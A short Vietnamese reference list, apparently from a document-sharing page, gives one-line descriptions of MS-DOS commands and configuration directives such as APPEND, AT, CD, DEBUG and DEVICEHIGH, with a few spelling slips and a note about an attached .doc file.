APPEND Cho phép các ứng dụng tìm kiếm dữ liệu trong các thư mục chỉ định AT Lập lịch để thực hiện một lệnh tự động nhờ dịch vụ Scheduler. CALL Gọi thi hành một tập lệnh CD Chuyển đổi thư mục hện hành. CHCP Thiết lập ngôn ngữ sử dụng cho hệ thống CMD Khởi động một sử kiện mới của trình biên dịch lệnh. DATE Hiển thị hoặc thiết lập ngày hệ thống DEBUG Thực hiện bẩy lỗi một ứng dụng Dos. DIVICE Tải vào bộ nhớ các trình điều khiển thiết bị DEVICEHIGH Tải ác trình điều khiển thiết bị vào vùng nhớ bậc cao. DOSKEY Gọi ứng dụng Doskey DOSONLY Ngăn chạy một ứng dụng không phải là ứng dụng Dos FCBS Chỉ định số khối điều khiển tập tin được mở... FILES Chỉ định số tập tin có thể truy cập cùng lúc.
Các file đính kèm theo tài liệu này:
- cac_lenh_trong_dos_8504.doc